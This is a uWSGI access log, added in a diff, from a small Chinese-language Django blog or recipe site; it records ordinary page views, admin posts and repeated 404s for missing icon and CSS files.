+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1252/1632] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:53:07 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1253/1633] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 06:53:07 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1254/1634] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 06:53:07 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1255/1635] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 06:53:07 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+delete
+[pid: 12823|app: 0|req: 1256/1636] 219.228.146.132 () {48 vars in 970 bytes} [Wed Jan 13 06:53:09 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1257/1637] 219.228.146.132 () {40 vars in 889 bytes} [Wed Jan 13 06:53:09 2021] GET /admin-home/ => generated 8052 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1258/1638] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1259/1639] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1260/1640] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1261/1641] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1262/1642] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1263/1643] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1264/1644] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 06:53:09 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1265/1645] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 06:53:09 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1266/1646] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 06:53:09 2021] GET /static/css/animate.css => generated 3430 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1267/1647] 219.228.146.132 () {40 vars in 877 bytes} [Wed Jan 13 06:53:15 2021] GET /publish/ => generated 5083 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+东坡肉 东坡肉做法
+[pid: 12823|app: 0|req: 1268/1648] 219.228.146.132 () {48 vars in 1058 bytes} [Wed Jan 13 06:56:39 2021] POST /publish/ => generated 0 bytes in 14 msecs (HTTP/1.1 302) 7 headers in 202 bytes (8 switches on core 0)
+[pid: 12823|app: 0|req: 1269/1649] 219.228.146.132 () {42 vars in 910 bytes} [Wed Jan 13 06:56:39 2021] GET /single/9 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1270/1650] 219.228.146.132 () {42 vars in 912 bytes} [Wed Jan 13 06:56:39 2021] GET /single/9/ => generated 9369 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1651] 219.228.146.132 () {38 vars in 808 bytes} [Wed Jan 13 06:56:39 2021] GET /static/img/t_photo/9_th%20(1).jpg => generated 13980 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: 0|req: 1271/1652] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 07:08:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1272/1653] 219.228.146.93 () {40 vars in 815 bytes} [Wed Jan 13 07:11:11 2021] GET /single-an-7 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1273/1654] 219.228.146.93 () {40 vars in 817 bytes} [Wed Jan 13 07:11:11 2021] GET /single-an-7/ => generated 3067 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1655] 219.228.146.93 () {38 vars in 767 bytes} [Wed Jan 13 07:11:11 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1656] 219.228.146.93 () {38 vars in 751 bytes} [Wed Jan 13 07:11:11 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1657] 219.228.146.93 () {38 vars in 768 bytes} [Wed Jan 13 07:11:11 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1658] 219.228.146.93 () {38 vars in 749 bytes} [Wed Jan 13 07:11:11 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1659] 219.228.146.93 () {38 vars in 776 bytes} [Wed Jan 13 07:11:11 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1660] 219.228.146.93 () {38 vars in 770 bytes} [Wed Jan 13 07:11:11 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1661] 219.228.146.93 () {38 vars in 772 bytes} [Wed Jan 13 07:11:11 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1662] 219.228.146.93 () {38 vars in 754 bytes} [Wed Jan 13 07:11:12 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1663] 219.228.146.93 () {38 vars in 788 bytes} [Wed Jan 13 07:11:12 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1664] 219.228.146.93 () {38 vars in 764 bytes} [Wed Jan 13 07:11:12 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1665] 219.228.146.93 () {38 vars in 796 bytes} [Wed Jan 13 07:11:14 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 1274/1666] 219.228.146.93 () {40 vars in 797 bytes} [Wed Jan 13 07:11:17 2021] GET /home/ => generated 9684 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1667] 219.228.146.93 () {38 vars in 795 bytes} [Wed Jan 13 07:11:17 2021] GET /static/img/t_photo/8_th.jpg => generated 14628 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1668] 219.228.146.93 () {38 vars in 795 bytes} [Wed Jan 13 07:11:17 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: 0|req: 1275/1669] 219.228.146.93 () {40 vars in 808 bytes} [Wed Jan 13 07:11:23 2021] GET /single/8 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1276/1670] 219.228.146.93 () {40 vars in 810 bytes} [Wed Jan 13 07:11:23 2021] GET /single/8/ => generated 8866 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1671] 219.228.146.93 () {38 vars in 759 bytes} [Wed Jan 13 07:11:23 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1672] 219.228.146.93 () {38 vars in 761 bytes} [Wed Jan 13 07:11:23 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1673] 219.228.146.93 () {38 vars in 799 bytes} [Wed Jan 13 07:11:23 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 1277/1674] 219.228.146.93 () {40 vars in 797 bytes} [Wed Jan 13 07:12:23 2021] GET /home/ => generated 9684 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1278/1675] 219.228.146.93 () {40 vars in 810 bytes} [Wed Jan 13 07:12:27 2021] GET /all-0-0-0 => generated 9499 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1676] 219.228.146.93 () {38 vars in 809 bytes} [Wed Jan 13 07:12:27 2021] GET /static/img/t_photo/9_th%20(1).jpg => generated 13980 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 1279/1677] 219.228.146.93 () {40 vars in 812 bytes} [Wed Jan 13 07:12:32 2021] GET /single/9 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1280/1678] 219.228.146.93 () {40 vars in 814 bytes} [Wed Jan 13 07:12:32 2021] GET /single/9/ => generated 9367 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /single
+[pid: 12823|app: 0|req: 1281/1679] 219.228.146.93 () {38 vars in 758 bytes} [Wed Jan 13 07:13:56 2021] GET /single => generated 3382 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 12823|app: 0|req: 1282/1680] 219.228.146.93 () {34 vars in 524 bytes} [Wed Jan 13 07:13:56 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1283/1681] 219.228.146.93 () {40 vars in 815 bytes} [Wed Jan 13 07:13:58 2021] GET /single/9/ => generated 9367 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1284/1682] 219.228.146.132 () {40 vars in 875 bytes} [Wed Jan 13 07:18:06 2021] GET /home/ => generated 9686 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1683] 219.228.146.132 () {40 vars in 850 bytes} [Wed Jan 13 07:18:06 2021] GET /static/img/t_photo/8_th.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+0
+0
+[, ]
+[pid: 12823|app: 0|req: 1285/1684] 219.228.146.132 () {40 vars in 879 bytes} [Wed Jan 13 07:18:15 2021] GET /all-1-0-0 => generated 9501 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1685] 219.228.146.132 () {40 vars in 864 bytes} [Wed Jan 13 07:18:15 2021] GET /static/img/t_photo/9_th%20(1).jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 1286/1686] 219.228.146.132 () {40 vars in 883 bytes} [Wed Jan 13 07:18:24 2021] GET /single/8/ => generated 8868 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1287/1687] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 07:52:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1288/1688] 83.97.20.21 () {26 vars in 277 bytes} [Wed Jan 13 08:33:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1289/1689] 219.228.146.132 () {40 vars in 889 bytes} [Wed Jan 13 08:36:34 2021] GET /admin-home/ => generated 9601 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1290/1690] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1291/1691] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1292/1692] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1293/1693] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1294/1694] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1295/1695] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1296/1696] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 08:36:34 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1297/1697] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:36:34 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1298/1698] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:36:34 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+zhiding
+置顶
+[pid: 12823|app: 0|req: 1299/1699] 219.228.146.132 () {48 vars in 970 bytes} [Wed Jan 13 08:36:36 2021] POST /admin-home/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1300/1700] 219.228.146.132 () {40 vars in 889 bytes} [Wed Jan 13 08:36:36 2021] GET /admin-home/ => generated 9601 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1301/1701] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1302/1702] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:36:37 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1303/1703] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1304/1704] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1305/1705] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1306/1706] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1307/1707] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1308/1708] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 08:36:37 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1309/1709] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:36:37 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1310/1710] 219.228.146.132 () {42 vars in 920 bytes} [Wed Jan 13 08:38:17 2021] GET /admin-home/ => generated 9601 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1311/1711] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1312/1712] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1313/1713] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1314/1714] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1315/1715] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1316/1716] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1317/1717] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 08:38:17 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1318/1718] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 08:38:17 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1319/1719] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:38:17 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1320/1720] 219.228.146.132 () {42 vars in 920 bytes} [Wed Jan 13 08:38:22 2021] GET /admin-home/ => generated 9601 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1321/1721] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 08:38:22 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1322/1722] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1323/1723] 219.228.146.132 () {38 vars in 800 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1324/1724] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 08:38:23 2021] GET /static/css/spinners.css => generated 3433 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1325/1725] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1326/1726] 219.228.146.132 () {38 vars in 820 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1327/1727] 219.228.146.132 () {38 vars in 821 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1328/1728] 219.228.146.132 () {38 vars in 877 bytes} [Wed Jan 13 08:38:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1329/1729] 219.228.146.132 () {38 vars in 767 bytes} [Wed Jan 13 08:38:23 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1330/1730] 219.228.146.132 () {40 vars in 892 bytes} [Wed Jan 13 08:38:25 2021] GET /announcement/ => generated 13398 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
